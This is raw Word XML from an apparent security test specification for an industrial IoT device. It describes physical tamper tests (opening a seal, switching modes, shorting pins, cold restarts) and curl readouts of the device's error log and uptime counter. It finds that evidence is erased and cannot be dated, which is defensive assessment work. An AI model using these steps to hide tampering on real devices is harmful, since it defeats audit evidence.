          <w:p w14:paraId="34E09D3D" w14:textId="64B073AE" w:rsidR="004B3AEF" w:rsidRPr="006D5B99" w:rsidRDefault="00817C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w:t>
            </w:r>
            <w:r w:rsidR="008E72AE" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E93A2A" w:rsidRPr="006D5B99"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E93A2A" w:rsidRPr="006D5B99" w:rsidRDefault="00E93A2A" w:rsidP="00E93A2A">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2323C4E4" w14:textId="29600257" w:rsidR="00E93A2A" w:rsidRPr="006D5B99" w:rsidRDefault="00504CB2" w:rsidP="00E93A2A">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E93A2A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>hysical setup as TC-RQ002-05, plus Kali (curl, IoT-Core error log) and the TIA laptop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E93A2A" w:rsidRPr="006D5B99"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E93A2A" w:rsidRPr="006D5B99" w:rsidRDefault="00E93A2A" w:rsidP="00E93A2A">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0157CA2B" w14:textId="404BDCB2" w:rsidR="00E93A2A" w:rsidRPr="006D5B99" w:rsidRDefault="00E93A2A" w:rsidP="00E93A2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 Online &amp; Diagnostics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E93A2A" w:rsidRPr="006D5B99"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E93A2A" w:rsidRPr="006D5B99" w:rsidRDefault="00E93A2A" w:rsidP="00E93A2A">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="395E60D2"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74B52F0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5DB12F6" w14:textId="409AE988"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cm_rq003-03_00_baseline.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20735058" w14:textId="63AC3D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t>
            </w:r>
            <w:r w:rsidR="00320EE1" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> N</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ote the rotary-switch value and photograph the seal state.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02DE05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1A916E6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Non-destructively open the seal, set the rotary switch to a special mode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58453298"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(e.g. 999 = firmware update); observe the live status (expect no</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71B2E581" w14:textId="72EF06A3"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immediate effect).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="771B8277"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75691221"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 power cable, wait 5-10s, reconnect; wait for</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE9626A"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RDY/P LED green).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4671620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06CAD1D5"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the error log:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DE094B3" w14:textId="5051E7EF"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cm_rq003-03_01_after_coldstart.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BB552F9"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diff cm_rq003-03_00_baseline.json cm_rq003-03_01_after_coldstart.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="163CD9ED"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p>
          <w:p w14:paraId="378106CE" w14:textId="77777777" w:rsidR="00E93A2A" w:rsidRPr="006D5B99" w:rsidRDefault="00E93A2A" w:rsidP="00E93A2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Check for any entry referencing the physical intervention, and whether</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C584B1B" w14:textId="6BEEDF08" w:rsidR="00E93A2A" w:rsidRPr="006D5B99" w:rsidRDefault="00E93A2A" w:rsidP="00E93A2A">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the log content persisted across the cold start (compare with baseline).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E93A2A" w:rsidRPr="006D5B99"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5D47B730" w:rsidR="00E93A2A" w:rsidRPr="006D5B99" w:rsidRDefault="00E93A2A" w:rsidP="00E93A2A">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630AD462" w14:textId="14FFD702" w:rsidR="00E93A2A" w:rsidRPr="006D5B99" w:rsidRDefault="00E93A2A" w:rsidP="00E93A2A">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tamper-specific entry found; log cleared by the cold start / intervention not attributable </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms G-1/G-3 in RQ-003.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68B46F3A" w14:textId="77777777" w:rsidR="006669AB" w:rsidRPr="006D5B99" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5373AD97" w14:textId="3F0FAE0A" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ003-04</w:t>
      </w:r>
      <w:r w:rsidR="00212F65" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Time-Attribution Failure of Collected Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D75605" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Level 1 - Abstract Test Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0BC154"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40B8A45D"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2ED8196B" w14:textId="4E0E1ABB"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RQ-003 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.11 / CR 3.9 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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03B7A555" w14:textId="24367993" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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8E72AE" w:rsidRPr="006D5B99"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749CCE15" w14:textId="36A4483E" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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8E72AE" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52EB3BC3" w14:textId="44A49B41" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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even the evidence the device does record cannot be placed in absolute time: the device exposes only an uptime reference that resets on cold start, with no </w:t>
            </w:r>
            <w:r w:rsidR="0000199A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>synchronized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> real-time clock, so interventions separated by a power cycle cannot be temporally ordered or dated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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7D9C743B"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loggable event; read the uptime reference and the log entry.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7623FA36"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Cold-restart.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D42D058" w14:textId="77777777" w:rsidR="00FA08A8"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second event; read the uptime reference again.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AFAE260" w14:textId="673F9B01" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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show the time base reset and the absence of any absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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7A2EE9D7" w14:textId="77777777" w:rsidR="00FA08A8"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entries carry a retained absolute timestamp enabling cross-restart ordering. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D555E6" w14:textId="7E325A5A" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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time base resets and no absolute timestamp is attached </w:t>
            </w:r>
            <w:r w:rsidR="0056358A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> evidence is not time-referenceable (CR 2.11 unmet).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62FA42B0" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DD33C7"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74351F1E"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68E26067" w14:textId="7194BD0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TC-RQ003-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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48A5A3B" w14:textId="0890D501" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="00796402"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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7948B06D" w14:textId="69D8928F" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="00A441D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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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0826D94B" w14:textId="33FC9A10"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0: Baseline </w:t>
            </w:r>
            <w:r w:rsidR="006E750F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="556AC5F2"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http://$SRIO/systemtime/systick/getdata | tee cm_rq003-04_systick_00_baseline.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C38BB7D" w14:textId="161A4A3C"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w:t>
            </w:r>
            <w:r w:rsidR="001104CF">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SRIO/devicestatus/errorlog/loglist/getdata</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> | tee cm_rq003-04_log_00_baseline.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="277D9DCD"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1B90D3" w14:textId="78606DB4"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1: Event 1 </w:t>
            </w:r>
            <w:r w:rsidR="006E750F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="518FAFD7" w14:textId="2B62926D"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440CAB" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Short-circuit pin 1 and pin 3.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1059A5FF"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A41E7C6" w14:textId="5EE8205B"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2: Readout after Event 1 </w:t>
            </w:r>
            <w:r w:rsidR="006E750F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D65835A"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http://$SRIO/systemtime/systick/getdata | tee cm_rq003-04_systick_01_event1.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6CE72B" w14:textId="24762B3D"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w:t>
            </w:r>
            <w:r w:rsidR="001104CF">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SRIO/devicestatus/errorlog/loglist/getdata</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> | tee cm_rq003-04_log_01_event1.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EED1D6F"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98F09BC" w14:textId="6C44F74C"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3: Cold-Restart </w:t>
            </w:r>
            <w:r w:rsidR="006E750F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EB1A2DE" w14:textId="77777777" w:rsidR="00E90304" w:rsidRPr="006D5B99" w:rsidRDefault="00AD47CD" w:rsidP="00E9030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E90304" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-&gt; Disconnect the power input cable from the SRIO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC1FF89" w14:textId="28425F35" w:rsidR="00E90304" w:rsidRPr="006D5B99" w:rsidRDefault="00E90304" w:rsidP="00E9030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--&gt; Wait 5</w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10 seconds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07BEBD80" w14:textId="2074D8ED" w:rsidR="00AD47CD" w:rsidRPr="006D5B99" w:rsidRDefault="00E90304" w:rsidP="00E9030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--&gt; Reconnect the power cable; wait until the RDY LED and P LED turn green</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B78862E" w14:textId="3FCB2DB6"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4: Readout after Cold-Restart </w:t>
            </w:r>
            <w:r w:rsidR="006E750F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C072C6"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http://$SRIO/systemtime/systick/getdata | tee cm_rq003-04_systick_02_after_coldstart.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06FFC42A" w14:textId="29111D00"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w:t>
            </w:r>
            <w:r w:rsidR="001104CF">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SRIO/devicestatus/errorlog/loglist/getdata</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> | tee cm_rq003-04_log_02_after_coldstart.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D153582"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51B2832F" w14:textId="26391343"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 </w:t>
            </w:r>
            <w:r w:rsidR="006E750F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5: Event 2 </w:t>
            </w:r>
            <w:r w:rsidR="006E750F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485F7C70" w14:textId="5765ADDD"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8D4AD3" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Short-circuit pin 1 and pin 3.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1235B0C7"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0CB7ED6" w14:textId="39FB5F68"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6: Readout after Event 2 </w:t>
            </w:r>
            <w:r w:rsidR="006E750F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09CDA898"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http://$SRIO/systemtime/systick/getdata | tee cm_rq003-04_systick_03_event2.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31C98252" w14:textId="5A73A8F3"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w:t>
            </w:r>
            <w:r w:rsidR="001104CF">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SRIO/devicestatus/errorlog/loglist/getdata</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> | tee cm_rq003-04_log_03_event2.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A9958FC"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7F7832F" w14:textId="3AE02E04"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w:t>
            </w:r>
            <w:r w:rsidR="006E750F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7: Evaluation </w:t>
            </w:r>
            <w:r w:rsidR="006E750F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D704810" w14:textId="37FDEA58"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7F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Log-comparison Baseline vs Event 1 </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17896B2D"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diff cm_rq003-04_log_00_baseline.json cm_rq003-04_log_01_event1.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DE15D44"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9C3AADC" w14:textId="44904899"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7F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Log-comparison after Coldstart vs Event 2 </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="027E7365"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diff cm_rq003-04_log_02_after_coldstart.json cm_rq003-04_log_03_event2.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="481DA961"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4F7D737" w14:textId="00963C4A"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7F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Systick-comparison </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="230835D2" w14:textId="77777777"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"Baseline:        $(cat cm_rq003-04_systick_00_baseline.txt)"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D056ECB" w14:textId="7C357998"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8D4AD3" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>After</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Event 1:    $(cat cm_rq003-04_systick_01_event1.txt)"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24780963" w14:textId="0509B9A4" w:rsidR="00AD47CD"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8D4AD3" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>After</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Coldstart:  $(cat cm_rq003-04_systick_02_after_coldstart.txt)"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5201D4DA" w14:textId="43167B86" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="00AD47CD" w:rsidP="00AD47CD">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echo "</w:t>
            </w:r>
            <w:r w:rsidR="00C62587" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>After</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Event 2:    $(cat cm_rq003-04_systick_03_event2.txt)"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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42DCF731" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="00C62587" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65E91194" w14:textId="77777777" w:rsidR="00C62587" w:rsidRPr="006D5B99"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73AA745C" w14:textId="4AC24758" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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uptime (systick) resets to ~0 on cold start; no absolute timestamp on any entry </w:t>
            </w:r>
            <w:r w:rsidR="007D27D3" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> not time-referenceable (CR 2.11 unmet). </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="568750BD" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2031498A" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C35DB1E" w14:textId="77777777" w:rsidR="006E0D6E" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ003-05 - </w:t>
      </w:r>
      <w:r w:rsidR="006E0D6E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Excluded (Development-Only) Interface Produces No Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B6813B" w14:textId="2C1351CC" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
